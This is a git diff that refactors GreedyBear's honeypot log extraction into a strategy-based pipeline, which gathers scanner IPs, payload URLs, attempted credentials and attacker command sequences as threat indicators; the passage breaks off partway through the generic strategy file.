-                ip_reputation = "mass scanner"
-        return ip_reputation
-
-    def _update_scores(self):
-        if not self.ioc_records:
-            return
-        updater = UpdateScores()
-        updater.score_only(self.ioc_records)
-
-    def _get_ioc_type(self, ioc):
-        try:
-            IPv4Address(ioc)
-        except ValueError:
-            ioc_type = DOMAIN
-        else:
-            ioc_type = IP
-        return ioc_type
-
-    def _check_first_time_run(self, honeypot_flag, general=False):
-        if not IOC.objects.exists():
-            # plus, we extract the sensors addresses so we can whitelist them
-            ExtractSensors().execute()
-            self.first_time_run = True
-        else:
-            # if this is not the overall first time, it could that honeypot first time
-            # FEEDS for a general honeypot it needs to be checked if it's in the list
-            if not general:
-                honeypot_ioc = IOC.objects.filter(**{f"{honeypot_flag}": True})
-            else:
-                honeypot_ioc = IOC.objects.filter(**{"general_honeypot__name__iexact": honeypot_flag})
-
-            if not honeypot_ioc.exists():
-                # first time we execute this project.
-                # So we increment the time range to get the data from the last 3 days
-                self.first_time_run = True
diff --git a/greedybear/cronjobs/base.py b/greedybear/cronjobs/base.py
index c1928169..8fe1abe9 100644
--- a/greedybear/cronjobs/base.py
+++ b/greedybear/cronjobs/base.py
@@ -2,11 +2,6 @@
 # See the file 'LICENSE' for copying permission.
 import logging
 from abc import ABCMeta, abstractmethod
-from datetime import datetime, timedelta
-
-from django.conf import settings
-from elasticsearch8.dsl import Q, Search
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
 
 
 class Cronjob(metaclass=ABCMeta):
@@ -28,75 +23,3 @@ def execute(self):
             self.success = True
         finally:
             self.log.info("Finished execution")
-
-
-class ElasticJob(Cronjob):
-    class ElasticServerDownException(Exception):
-        pass
-
-    def __init__(self):
-        super().__init__()
-        self.elastic_client = settings.ELASTIC_CLIENT
-
-    def _healthcheck(self):
-        if not self.elastic_client.ping():
-            raise self.ElasticServerDownException("elastic server is not reachable, could be down")
-
-    def _base_search(self, honeypot):
-        """
-        base method to create queries to Elastic
-        :param honeypot: Honeypot instance
-        :return: Search instance
-        """
-        search = Search(using=self.elastic_client, index="logstash-*")
-        self.log.debug(f"minutes_back_to_lookup: {self.minutes_back_to_lookup}")
-        if LEGACY_EXTRACTION:
-            gte_date = f"now-{self.minutes_back_to_lookup}m/m"
-            # Some honeypots had different column for the time
-            # like 'timestamp' others 'start_time','end_time'
-            # on older TPot versions.
-            # This chooses the one that exists
-            q = Q(
-                "bool",
-                should=[
-                    Q("range", timestamp={"gte": gte_date, "lte": "now/m"}),
-                    Q("range", end_time={"gte": gte_date, "lte": "now/m"}),
-                    Q("range", **{"@timestamp": {"gte": gte_date, "lte": "now/m"}}),
-                ],
-                minimum_should_match=1,
-            )
-        else:
-            window_start, window_end = get_time_window(datetime.now(), self.minutes_back_to_lookup)
-            self.log.debug(f"time window: {window_start} - {window_end}")
-            q = Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
-        search = search.query(q)
-        search = search.filter("term", **{"type.keyword": honeypot.name})
-        return search
-
-    @property
-    @abstractmethod
-    def minutes_back_to_lookup(self):
-        pass
-
-
-def get_time_window(reference_time: datetime, lookback_minutes: int = EXTRACTION_INTERVAL) -> tuple[datetime, datetime]:
-    """
-    Calculates a time window that ends at the last completed extraction interval and looks back a specified number of minutes.
-
-    Args:
-        reference_time (datetime): Reference point in time
-        lookback_minutes (int): Minutes to look back (default: EXTRACTION_INTERVAL)
-
-    Returns:
-        tuple: A tuple containing the start and end time of the time window as datetime objects
-
-    Raises:
-        ValueError: If lookback_minutes is less than EXTRACTION_INTERVAL
-    """
-    if lookback_minutes < EXTRACTION_INTERVAL:
-        raise ValueError(f"Argument lookback_minutes size must be at least {EXTRACTION_INTERVAL} minutes.")
-
-    rounded_minute = (reference_time.minute // EXTRACTION_INTERVAL) * EXTRACTION_INTERVAL
-    window_end = reference_time.replace(minute=rounded_minute, second=0, microsecond=0)
-    window_start = window_end - timedelta(minutes=lookback_minutes)
-    return (window_start, window_end)
diff --git a/greedybear/cronjobs/cowrie.py b/greedybear/cronjobs/cowrie.py
deleted file mode 100644
index 4e763eb3..00000000
--- a/greedybear/cronjobs/cowrie.py
+++ /dev/null
@@ -1,192 +0,0 @@
-# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
-# See the file 'LICENSE' for copying permission.
-import re
-from collections import defaultdict
-from hashlib import sha256
-from urllib.parse import urlparse
-
-from greedybear.consts import ATTACK_DATA_FIELDS, PAYLOAD_REQUEST, SCANNER
-from greedybear.cronjobs.attacks import ExtractAttacks
-from greedybear.cronjobs.honeypots import Honeypot
-from greedybear.models import IOC, CommandSequence, CowrieSession
-from greedybear.regex import REGEX_URL_PROTOCOL
-
-
-class ExtractCowrie(ExtractAttacks):
-    def __init__(self, minutes_back=None):
-        super().__init__(minutes_back=minutes_back)
-        self.cowrie = Honeypot("Cowrie")
-        self.added_scanners = 0
-        self.payloads_in_message = 0
-        self.added_ip_downloads = 0
-        self.added_url_downloads = 0
-
-    def _cowrie_lookup(self):
-        self._get_scanners()
-        self._get_url_downloads()
-        self.log.info(
-            f"added {self.added_scanners} scanners, "
-            f"{self.payloads_in_message} payload found in messages,"
-            f" {self.added_ip_downloads} IP that tried to download,"
-            f" {self.added_url_downloads} URL to download"
-        )
-
-    def _get_scanners(self):
-        for ioc in self._get_attacker_data(self.cowrie, ATTACK_DATA_FIELDS):
-            ioc.cowrie = True
-            self.log.info(f"found IP {ioc.name} by honeypot cowrie")
-            ioc = self._add_ioc(ioc, attack_type=SCANNER)
-            if ioc:
-                self.added_scanners += 1
-                self._extract_possible_payload_in_messages(ioc.name)
-                self._get_sessions(ioc)
-
-    def _extract_possible_payload_in_messages(self, scanner_ip):
-        # looking for URLs inside attacks payloads
-        search = self._base_search(self.cowrie)
-        search = search.filter("terms", eventid=["cowrie.login.failed", "cowrie.session.file_upload"])
-        search = search.filter("term", src_ip=scanner_ip)
-        search = search.source(["message"])
-        hits = search[:100].execute()
-        for hit in hits:
-            match_url = re.search(REGEX_URL_PROTOCOL, hit.message)
-            if match_url:
-                payload_url = match_url.group()
-                self.log.info(f"found hidden URL {payload_url} in payload from attacker {scanner_ip}")
-                payload_hostname = urlparse(payload_url).hostname
-                self.log.info(f"extracted hostname {payload_hostname} from {payload_url}")
-                ioc = IOC(
-                    name=payload_hostname,
-                    type=self._get_ioc_type(payload_hostname),
-                    cowrie=True,
-                    related_urls=[payload_url],
-                )
-                self._add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
-                self._add_fks(scanner_ip, payload_hostname)
-
-    def _get_url_downloads(self):
-        search = self._base_search(self.cowrie)
-        search = search.filter("term", eventid="cowrie.session.file_download")
-        search = search.filter("exists", field="url")
-        search = search.source(["src_ip", "url"])
-        hits = search[:1000].execute()
-        for hit in hits:
-            self.log.info(f"found IP {hit.src_ip} trying to execute download from {hit.url}")
-            scanner_ip = str(hit.src_ip)
-            ioc = IOC(name=scanner_ip, type=self._get_ioc_type(scanner_ip), cowrie=True)
-            self._add_ioc(ioc, attack_type=SCANNER)
-            self.added_ip_downloads += 1
-            download_url = str(hit.url)
-            if download_url:
-                hostname = urlparse(download_url).hostname
-                ioc = IOC(
-                    name=hostname,
-                    type=self._get_ioc_type(hostname),
-                    cowrie=True,
-                    related_urls=[download_url],
-                )
-                self._add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
-                self.added_url_downloads += 1
-                self._add_fks(scanner_ip, hostname)
-
-    def _get_sessions(self, ioc):
-        scanner_ip = ioc.name
-        self.log.info(f"adding cowrie sessions from {scanner_ip}")
-        search = self._base_search(self.cowrie)
-        search = search.filter("term", src_ip=scanner_ip)
-        search = search.source(["session", "eventid", "timestamp", "duration", "message", "username", "password"])
-        hits_per_session = defaultdict(list)
-
-        for hit in search.iterate():
-            hits_per_session[int(hit.session, 16)].append(hit)
-
-        for sid, hits in hits_per_session.items():
-            try:
-                session_record = CowrieSession.objects.get(session_id=sid)
-            except CowrieSession.DoesNotExist:
-                session_record = CowrieSession(session_id=sid)
-
-            session_record.source = ioc
-            for hit in sorted(hits, key=lambda hit: hit.timestamp):
-                match hit.eventid:
-                    case "cowrie.session.connect":
-                        session_record.start_time = hit.timestamp
-                    case "cowrie.login.failed" | "cowrie.login.success":
-                        session_record.login_attempt = True
-                        username = hit.username.replace("\x00", "[NUL]")
-                        password = hit.password.replace("\x00", "[NUL]")
-                        session_record.credentials.append(f"{username} | {password}")
-                        session_record.source.login_attempts += 1
-                    case "cowrie.command.input":
-                        self.log.info(f"found a command execution from {scanner_ip}")
-                        session_record.command_execution = True
-                        if session_record.commands is None:
-                            session_record.commands = CommandSequence()
-                            session_record.commands.first_seen = hit.timestamp
-                        command = hit.message.removeprefix("CMD: ").replace("\x00", "[NUL]")
-                        session_record.commands.last_seen = hit.timestamp
-                        session_record.commands.commands.append(command[:1024])
-                    case "cowrie.session.closed":
-                        session_record.duration = hit.duration
-                session_record.interaction_count += 1
-            if session_record.commands is not None:
-                # moved this check at the end to avoid forgetting about this...
-                # ...if the "closed" record is not available
-                self._deduplicate_command_sequence(session_record)
-                session_record.commands.save()
-                self.log.info(f"saved new command execute from {scanner_ip} " f"with hash {session_record.commands.commands_hash}")
-            session_record.source.save()
-            session_record.save()
-
-        self.log.info(f"{len(hits_per_session)} sessions added")
-
-    def _add_fks(self, scanner_ip, hostname):
-        self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}")
-        scanner_ip_instance = IOC.objects.filter(name=scanner_ip).first()
-        hostname_instance = IOC.objects.filter(name=hostname).first()
-
-        if scanner_ip_instance:
-            if hostname_instance and hostname_instance not in scanner_ip_instance.related_ioc.all():
-                scanner_ip_instance.related_ioc.add(hostname_instance)
-            scanner_ip_instance.save()
-
-        if hostname_instance:
-            if scanner_ip_instance and scanner_ip_instance not in hostname_instance.related_ioc.all():
-                hostname_instance.related_ioc.add(scanner_ip_instance)
-            hostname_instance.save()
-
-    def _deduplicate_command_sequence(self, session: CowrieSession) -> bool:
-        """
-        Deduplicates command sequences by hashing and either linking to an existing
-        sequence or preparing for creation of a new one.
-
-        Args:
-            session: A CowrieSession instance containing command sequence data
-
-        Returns:
-            bool: True if merged with existing sequence, else False
-        """
-        commands_str = "\n".join(session.commands.commands)
-        commands_hash = sha256(commands_str.encode()).hexdigest()
-        try:
-            # Check if the recorded sequence already exists
-            cmd_seq = CommandSequence.objects.get(commands_hash=commands_hash)
-        except CommandSequence.DoesNotExist:
-            # In case sequence does not exist:
-            # Assign hash to the the sequence
-            session.commands.commands_hash = commands_hash
-            return False
-        # In case sequence does already exist:
-        # Delete newly created sequence from DB
-        # and assign existing sequence to session
-        last_seen = session.commands.last_seen
-        session.commands = cmd_seq
-        # updated the last seen
-        session.commands.last_seen = last_seen
-        return True
-
-    def run(self):
-        self._healthcheck()
-        self._check_first_time_run("cowrie")
-        self._cowrie_lookup()
-        self._update_scores()
diff --git a/greedybear/cronjobs/extract.py b/greedybear/cronjobs/extract.py
new file mode 100644
index 00000000..bab597aa
--- /dev/null
+++ b/greedybear/cronjobs/extract.py
@@ -0,0 +1,13 @@
+from greedybear.cronjobs.base import Cronjob
+from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+
+class ExtractionJob(Cronjob):
+    def __init__(self):
+        super().__init__()
+        self.pipeline = ExtractionPipeline()
+
+    def run(self):
+        self.log.info("Beginning extraction.")
+        result = self.pipeline.execute()
+        self.log.info(f"Done. Extracted {result} IOCs.")
diff --git a/greedybear/cronjobs/extraction/ioc_processor.py b/greedybear/cronjobs/extraction/ioc_processor.py
new file mode 100644
index 00000000..93b0f189
--- /dev/null
+++ b/greedybear/cronjobs/extraction/ioc_processor.py
@@ -0,0 +1,110 @@
+import logging
+from typing import Optional
+
+from greedybear.consts import PAYLOAD_REQUEST, SCANNER
+from greedybear.cronjobs.extraction.utils import is_whatsmyip_domain
+from greedybear.cronjobs.repositories import IocRepository, SensorRepository
+from greedybear.models import IOC, iocType
+
+
+class IocProcessor:
+    """
+    Processor for creating and updating IOC records.
+
+    Handles filtering, merging, and persistence of IOC data extracted
+    from T-Pot. Uses injected repositories for data access.
+    """
+
+    def __init__(self, ioc_repo: IocRepository, sensor_repo: SensorRepository):
+        """
+        Initialize the processor with required repositories.
+
+        Args:
+            ioc_repo: Repository for IOC data access.
+            sensor_repo: Repository for sensor data access.
+        """
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+        self.ioc_repo = ioc_repo
+        self.sensor_repo = sensor_repo
+
+    def add_ioc(self, ioc: IOC, attack_type: str, general_honeypot_name: str = None) -> Optional[IOC]:
+        """
+        Process an IOC record.
+        Filters out sensor IPs and whats-my-ip domains, then creates a new
+        IOC record or updates an existing one. Associates the IOC with a
+        general honeypot if specified.
+
+        Args:
+            ioc: IOC instance to process.
+            attack_type: Type of attack (SCANNER or PAYLOAD_REQUEST).
+            general_honeypot_name: Optional honeypot name to associate with the IOC.
+
+        Returns:
+            The persisted IOC record, or None if filtered out.
+        """
+        self.log.info(f"processing ioc {ioc} for attack_type {attack_type}")
+
+        if ioc.name in self.sensor_repo.sensors:
+            self.log.debug(f"not saved {ioc} because it is a sensor")
+            return None
+
+        if ioc.type == iocType.DOMAIN and is_whatsmyip_domain(ioc.name):
+            self.log.debug(f"not saved {ioc} because it is a whats-my-ip domain")
+            return None
+
+        ioc_record = self.ioc_repo.get_ioc_by_name(ioc.name)
+        if ioc_record is None:  # Create
+            self.log.debug(f"{ioc} was not seen before - creating a new record")
+            ioc_record = self.ioc_repo.save(ioc)
+        else:  # Update
+            self.log.debug(f"{ioc} is already known - updating record")
+            ioc_record = self._merge_iocs(ioc_record, ioc)
+
+        if general_honeypot_name is not None:
+            ioc_record = self.ioc_repo.add_honeypot_to_ioc(general_honeypot_name, ioc_record)
+
+        ioc_record = self._update_days_seen(ioc_record)
+        ioc_record.scanner = ioc_record.scanner or (attack_type == SCANNER)
+        ioc_record.payload_request = ioc_record.payload_request or (attack_type == PAYLOAD_REQUEST)
+
+        self.ioc_repo.save(ioc_record)
+        return ioc_record
+
+    def _merge_iocs(self, existing: IOC, new: IOC) -> IOC:
+        """
+        Merge a new IOC's data into an existing record.
+        Updates timestamps, increments counters, and combines list fields.
+
+        Args:
+            existing: The existing IOC record from the database.
+            new: The new IOC data to merge in.
+
+        Returns:
+            The updated existing IOC record.
+        """
+        existing.last_seen = new.last_seen
+        existing.attack_count += 1
+        existing.interaction_count += new.interaction_count
+        existing.related_urls = sorted(set(existing.related_urls + new.related_urls))
+        existing.destination_ports = sorted(set(existing.destination_ports + new.destination_ports))
+        existing.ip_reputation = new.ip_reputation
+        existing.asn = new.asn
+        existing.login_attempts += new.login_attempts
+        return existing
+
+    def _update_days_seen(self, ioc: IOC) -> IOC:
+        """
+        Update the days_seen list if the IOC was seen on a new day.
+        Appends the current date to days_seen if it differs from the last
+        recorded date, and updates the count accordingly.
+
+        Args:
+            ioc: The IOC record to update.
+
+        Returns:
+            The updated IOC record.
+        """
+        if len(ioc.days_seen) == 0 or ioc.days_seen[-1] != ioc.last_seen.date():
+            ioc.days_seen.append(ioc.last_seen.date())
+            ioc.number_of_days_seen = len(ioc.days_seen)
+        return ioc
diff --git a/greedybear/cronjobs/extraction/pipeline.py b/greedybear/cronjobs/extraction/pipeline.py
new file mode 100644
index 00000000..0adec1b8
--- /dev/null
+++ b/greedybear/cronjobs/extraction/pipeline.py
@@ -0,0 +1,88 @@
+import logging
+from collections import defaultdict
+
+from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+from greedybear.cronjobs.repositories import ElasticRepository, IocRepository, SensorRepository
+from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+from greedybear.settings import EXTRACTION_INTERVAL, INITIAL_EXTRACTION_TIMESPAN, LEGACY_EXTRACTION
+
+
+class ExtractionPipeline:
+    """
+    Pipeline for extracting IOCs from T-Pot's honeypot logs.
+    Orchestrates the extraction workflow.
+    """
+
+    def __init__(self):
+        """Initialize the pipeline with required repositories."""
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+        self.elastic_repo = ElasticRepository()
+        self.ioc_repo = IocRepository()
+        self.sensor_repo = SensorRepository()
+
+    @property
+    def _minutes_back_to_lookup(self) -> int:
+        """
+        Calculate the time window size for Elasticsearch queries.
+        Returns a larger window on first run to backfill historical data,
+        otherwise uses the configured extraction interval.
+
+        Returns:
+            Number of minutes to look back in the search query.
+        """
+        if self.ioc_repo.is_empty():
+            return INITIAL_EXTRACTION_TIMESPAN
+        return 11 if LEGACY_EXTRACTION else EXTRACTION_INTERVAL
+
+    def execute(self) -> int:
+        """
+        Execute the extraction pipeline.
+
+        Performs the following steps:
+        1. Search Elasticsearch for honeypot log entries
+        2. Group hits by honeypot type and extract sensors
+        3. Apply honeypot-specific extraction strategies
+        4. Update IOC scores
+
+        Returns:
+            Number of IOC records processed.
+        """
+        # 1. Search
+        self.log.info("Getting honeypot hits from Elasticsearch")
+        search_result = self.elastic_repo.search(self._minutes_back_to_lookup)
+        hits_by_honeypot = defaultdict(list)
+
+        # 2. Group by honeypot
+        self.log.info("Grouping hits by honeypot type")
+        for hit in search_result:
+            # skip hits with non-existing or empty sources
+            if "src_ip" not in hit or not hit["src_ip"].strip():
+                continue
+            # skip hits with non-existing or empty types (=honeypots)
+            if "type" not in hit or not hit["type"].strip():
+                continue
+            # extract sensor
+            if "t-pot_ip_ext" in hit:
+                self.sensor_repo.add_sensor(hit["t-pot_ip_ext"])
+            hits_by_honeypot[hit["type"]].append(hit.to_dict())
+
+        # 3. Extract using strategies
+        ioc_records = []
+        factory = ExtractionStrategyFactory(self.ioc_repo, self.sensor_repo)
+        for honeypot, hits in sorted(hits_by_honeypot.items()):
+            if not self.ioc_repo.is_ready_for_extraction(honeypot):
+                self.log.info(f"Skipping honeypot {honeypot}")
+                continue
+            self.log.info(f"Extracting hits from honeypot {honeypot}")
+            strategy = factory.get_strategy(honeypot)
+            try:
+                strategy.extract_from_hits(hits)
+                ioc_records += strategy.ioc_records
+            except Exception as exc:
+                self.log.error(f"Extraction failed for honeypot {honeypot}: {exc}")
+
+        # 4. Update scores
+        self.log.info("Updating scores")
+        if ioc_records:
+            UpdateScores().score_only(ioc_records)
+        return len(ioc_records)
diff --git a/greedybear/cronjobs/extraction/strategies/__init__.py b/greedybear/cronjobs/extraction/strategies/__init__.py
new file mode 100644
index 00000000..ea386477
--- /dev/null
+++ b/greedybear/cronjobs/extraction/strategies/__init__.py
@@ -0,0 +1,4 @@
+from greedybear.cronjobs.extraction.strategies.base import *
+from greedybear.cronjobs.extraction.strategies.cowrie import *
+from greedybear.cronjobs.extraction.strategies.generic import *
+from greedybear.cronjobs.extraction.strategies.log4pot import *
diff --git a/greedybear/cronjobs/extraction/strategies/base.py b/greedybear/cronjobs/extraction/strategies/base.py
new file mode 100644
index 00000000..8aaed797
--- /dev/null
+++ b/greedybear/cronjobs/extraction/strategies/base.py
@@ -0,0 +1,48 @@
+import logging
+from abc import ABCMeta, abstractmethod
+
+from greedybear.cronjobs.extraction.ioc_processor import IocProcessor
+from greedybear.cronjobs.repositories import IocRepository, SensorRepository
+
+
+class BaseExtractionStrategy(metaclass=ABCMeta):
+    """
+    Abstract base class for T-Pot extraction strategies.
+
+    Subclasses implement `extract_from_hits` to define honeypot-specific
+    logic for processing log entries into IOC records.
+
+    Attributes:
+        honeypot: Name of the honeypot this strategy handles.
+        ioc_repo: Repository for IOC data access.
+        sensor_repo: Repository for sensor data access.
+        log: Logger instance for this class.
+        ioc_processor: Processor for creating and updating IOC records.
+        ioc_records: List of IOC records extracted during processing.
+    """
+
+    def __init__(
+        self,
+        honeypot: str,
+        ioc_repo: IocRepository,
+        sensor_repo: SensorRepository,
+    ):
+        self.honeypot = honeypot
+        self.ioc_repo = ioc_repo
+        self.sensor_repo = sensor_repo
+
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+        self.ioc_processor = IocProcessor(self.ioc_repo, self.sensor_repo)
+        self.ioc_records = []
+
+    @abstractmethod
+    def extract_from_hits(self, hits: list[dict]) -> None:
+        """
+        Extract IOC records from honeypot log hits.
+        Subclasses must implement this method to define honeypot-specific
+        extraction logic. Extracted records should be stored in `ioc_records`.
+
+        Args:
+            hits: List of Elasticsearch hit dictionaries to process.
+        """
+        pass
diff --git a/greedybear/cronjobs/extraction/strategies/cowrie.py b/greedybear/cronjobs/extraction/strategies/cowrie.py
new file mode 100644
index 00000000..9ba7808b
--- /dev/null
+++ b/greedybear/cronjobs/extraction/strategies/cowrie.py
@@ -0,0 +1,195 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+import re
+from collections import defaultdict
+from hashlib import sha256
+from urllib.parse import urlparse
+
+from greedybear.consts import PAYLOAD_REQUEST, SCANNER
+from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy
+from greedybear.cronjobs.extraction.utils import get_ioc_type, iocs_from_hits, threatfox_submission
+from greedybear.cronjobs.repositories import CowrieSessionRepository, IocRepository, SensorRepository
+from greedybear.models import IOC, CommandSequence, CowrieSession
+from greedybear.regex import REGEX_URL_PROTOCOL
+
+
+class CowrieExtractionStrategy(BaseExtractionStrategy):
+    """
+    Extraction strategy for Cowrie SSH/Telnet honeypot.
+    Extracts scanner IPs, payload URLs from login attempts and file downloads,
+    and session data including credentials and command sequences. Links related
+    IOCs (scanners to download URLs) and deduplicates command sequences by hash.
+    """
+
+    def __init__(
+        self,
+        honeypot: str,
+        ioc_repo: IocRepository,
+        sensor_repo: SensorRepository,
+        session_repo: CowrieSessionRepository = None,
+    ):
+        super().__init__(honeypot, ioc_repo, sensor_repo)
+        self.session_repo = session_repo or CowrieSessionRepository()
+        self.payloads_in_message = 0
+        self.added_ip_downloads = 0
+        self.added_url_downloads = 0
+
+    def extract_from_hits(self, hits: list[dict]) -> None:
+        self._get_scanners(hits)
+        self._get_url_downloads(hits)
+        self.log.info(
+            f"added {len(self.ioc_records)} scanners, "
+            f"{self.payloads_in_message} payload found in messages, "
+            f"{self.added_ip_downloads} IP that tried to download, "
+            f"{self.added_url_downloads} URL to download"
+        )
+
+    def _get_scanners(self, hits: list[dict]) -> None:
+        for ioc in iocs_from_hits(hits):
+            ioc.cowrie = True
+            self.log.info(f"found IP {ioc.name} by honeypot cowrie")
+            ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+            if ioc_record:
+                self.ioc_records.append(ioc_record)
+                threatfox_submission(ioc_record, ioc.related_urls, self.log)
+                self._extract_possible_payload_in_messages(ioc_record.name, hits)
+                self._get_sessions(ioc_record, hits)
+
+    def _extract_possible_payload_in_messages(self, scanner_ip: str, hits: list[dict]) -> None:
+        # looking for URLs inside attacks payloads
+        for hit in hits:
+            if hit["src_ip"] != scanner_ip:
+                continue
+            if hit.get("eventid", "") not in ["cowrie.login.failed", "cowrie.session.file_upload"]:
+                continue
+            match_url = re.search(REGEX_URL_PROTOCOL, hit.get("message", ""))
+            if match_url:
+                payload_url = match_url.group()
+                self.log.info(f"found hidden URL {payload_url} in payload from attacker {scanner_ip}")
+                payload_hostname = urlparse(payload_url).hostname
+                self.log.info(f"extracted hostname {payload_hostname} from {payload_url}")
+                ioc = IOC(
+                    name=payload_hostname,
+                    type=get_ioc_type(payload_hostname),
+                    cowrie=True,
+                    related_urls=[payload_url],
+                )
+                self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+                self._add_fks(scanner_ip, payload_hostname)
+                self.payloads_in_message += 1
+
+    def _get_url_downloads(self, hits: list[dict]) -> None:
+        for hit in hits:
+            if "url" not in hit:
+                continue
+            if hit.get("eventid", "") != "cowrie.session.file_download":
+                continue
+            self.log.info(f"found IP {hit['src_ip']} trying to execute download from {hit['url']}")
+            scanner_ip = str(hit["src_ip"])
+            ioc = IOC(name=scanner_ip, type=get_ioc_type(scanner_ip), cowrie=True)
+            ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=SCANNER)
+            if ioc_record:
+                self.added_ip_downloads += 1
+                threatfox_submission(ioc_record, ioc.related_urls, self.log)
+            download_url = str(hit["url"])
+            if download_url:
+                hostname = urlparse(download_url).hostname
+                ioc = IOC(
+                    name=hostname,
+                    type=get_ioc_type(hostname),
+                    cowrie=True,
+                    related_urls=[download_url],
+                )
+                ioc_record = self.ioc_processor.add_ioc(ioc, attack_type=PAYLOAD_REQUEST)
+                if ioc_record:
+                    self.added_url_downloads += 1
+                    threatfox_submission(ioc_record, ioc.related_urls, self.log)
+                self._add_fks(scanner_ip, hostname)
+
+    def _get_sessions(self, ioc: IOC, hits: list[dict]) -> None:
+        self.log.info(f"adding cowrie sessions from {ioc.name}")
+        hits_per_session = defaultdict(list)
+
+        for hit in hits:
+            if hit["src_ip"] != ioc.name:
+                continue
+            hits_per_session[hit["session"]].append(hit)
+
+        for sid, hits in hits_per_session.items():
+            session_record = self.session_repo.get_or_create_session(session_id=sid, source=ioc)
+            for hit in sorted(hits, key=lambda hit: hit["timestamp"]):
+                match hit["eventid"]:
+                    case "cowrie.session.connect":
+                        session_record.start_time = hit["timestamp"]
+                    case "cowrie.login.failed" | "cowrie.login.success":
+                        session_record.login_attempt = True
+                        username = hit["username"].replace("\x00", "[NUL]")
+                        password = hit["password"].replace("\x00", "[NUL]")
+                        session_record.credentials.append(f"{username} | {password}")
+                        session_record.source.login_attempts += 1
+                    case "cowrie.command.input":
+                        self.log.info(f"found a command execution from {ioc.name}")
+                        session_record.command_execution = True
+                        if session_record.commands is None:
+                            session_record.commands = CommandSequence()
+                            session_record.commands.first_seen = hit["timestamp"]
+                        command = hit["message"].removeprefix("CMD: ").replace("\x00", "[NUL]")
+                        session_record.commands.last_seen = hit["timestamp"]
+                        session_record.commands.commands.append(command[:1024])
+                    case "cowrie.session.closed":
+                        session_record.duration = hit["duration"]
+                session_record.interaction_count += 1
+            if session_record.commands is not None:
+                # moved this check at the end to avoid forgetting about this...
+                # ...if the "closed" record is not available
+                self._deduplicate_command_sequence(session_record)
+                self.session_repo.save_command_sequence(session_record.commands)
+                self.log.info(f"saved new command execute from {ioc.name} " f"with hash {session_record.commands.commands_hash}")
+            self.ioc_repo.save(session_record.source)
+            self.session_repo.save_session(session_record)
+
+        self.log.info(f"{len(hits_per_session)} sessions added")
+
+    def _add_fks(self, scanner_ip, hostname):
+        self.log.info(f"adding foreign keys for the following iocs: {scanner_ip}, {hostname}")
+        scanner_ip_instance = self.ioc_repo.get_ioc_by_name(scanner_ip)
+        hostname_instance = self.ioc_repo.get_ioc_by_name(hostname)
+
+        if scanner_ip_instance is not None:
+            if hostname_instance and hostname_instance not in scanner_ip_instance.related_ioc.all():
+                scanner_ip_instance.related_ioc.add(hostname_instance)
+            self.ioc_repo.save(scanner_ip_instance)
+
+        if hostname_instance is not None:
+            if scanner_ip_instance and scanner_ip_instance not in hostname_instance.related_ioc.all():
+                hostname_instance.related_ioc.add(scanner_ip_instance)
+            self.ioc_repo.save(hostname_instance)
+
+    def _deduplicate_command_sequence(self, session: CowrieSession) -> bool:
+        """
+        Deduplicates command sequences by hashing and either linking to an existing
+        sequence or preparing for creation of a new one.
+
+        Args:
+            session: A CowrieSession instance containing command sequence data
+
+        Returns:
+            bool: True if merged with existing sequence, else False
+        """
+        commands_str = "\n".join(session.commands.commands)
+        commands_hash = sha256(commands_str.encode()).hexdigest()
+        # Check if the recorded sequence already exists
+        cmd_seq = self.session_repo.get_command_sequence_by_hash(commands_hash=commands_hash)
+        if cmd_seq is None:
+            # In case sequence does not exist:
+            # Assign hash to the the sequence
+            session.commands.commands_hash = commands_hash
+            return False
+        # In case sequence does already exist:
+        # Delete newly created sequence from DB
+        # and assign existing sequence to session
+        last_seen = session.commands.last_seen
+        session.commands = cmd_seq
+        # updated the last seen
+        session.commands.last_seen = last_seen
+        return True
diff --git a/greedybear/cronjobs/extraction/strategies/factory.py b/greedybear/cronjobs/extraction/strategies/factory.py
new file mode 100644
index 00000000..16c70d11
--- /dev/null
+++ b/greedybear/cronjobs/extraction/strategies/factory.py
@@ -0,0 +1,39 @@
+from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy, CowrieExtractionStrategy, GenericExtractionStrategy, Log4potExtractionStrategy
+from greedybear.cronjobs.repositories import IocRepository, SensorRepository
+
+
+class ExtractionStrategyFactory:
+    """
+    Factory for creating honeypot extraction strategies.
+    Returns specialized strategies for special honeypots,
+    and a generic strategy for all others.
+    """
+
+    def __init__(self, ioc_repo: IocRepository, sensor_repo: SensorRepository):
+        """
+        Initialize the factory with required repositories.
+
+        Args:
+            ioc_repo: Repository for IOC data access.
+            sensor_repo: Repository for sensor data access.
+        """
+        self.ioc_repo = ioc_repo
+        self.sensor_repo = sensor_repo
+        self._strategies = {
+            "Cowrie": lambda: CowrieExtractionStrategy("Cowrie", self.ioc_repo, self.sensor_repo),
+            "Log4pot": lambda: Log4potExtractionStrategy("Log4pot", self.ioc_repo, self.sensor_repo),
+        }
+
+    def get_strategy(self, honeypot: str) -> BaseExtractionStrategy:
+        """
+        Get the appropriate extraction strategy for a honeypot.
+
+        Args:
+            honeypot: Name of the honeypot.
+
+        Returns:
+            A fitting strategy.
+        """
+        if honeypot in self._strategies:
+            return self._strategies[honeypot]()
+        return GenericExtractionStrategy(honeypot, self.ioc_repo, self.sensor_repo)
diff --git a/greedybear/cronjobs/extraction/strategies/generic.py b/greedybear/cronjobs/extraction/strategies/generic.py
new file mode 100644
index 00000000..f4653e1f
--- /dev/null
+++ b/greedybear/cronjobs/extraction/strategies/generic.py
@@ -0,0 +1,30 @@
+from greedybear.consts import SCANNER
+from greedybear.cronjobs.extraction.strategies import BaseExtractionStrategy
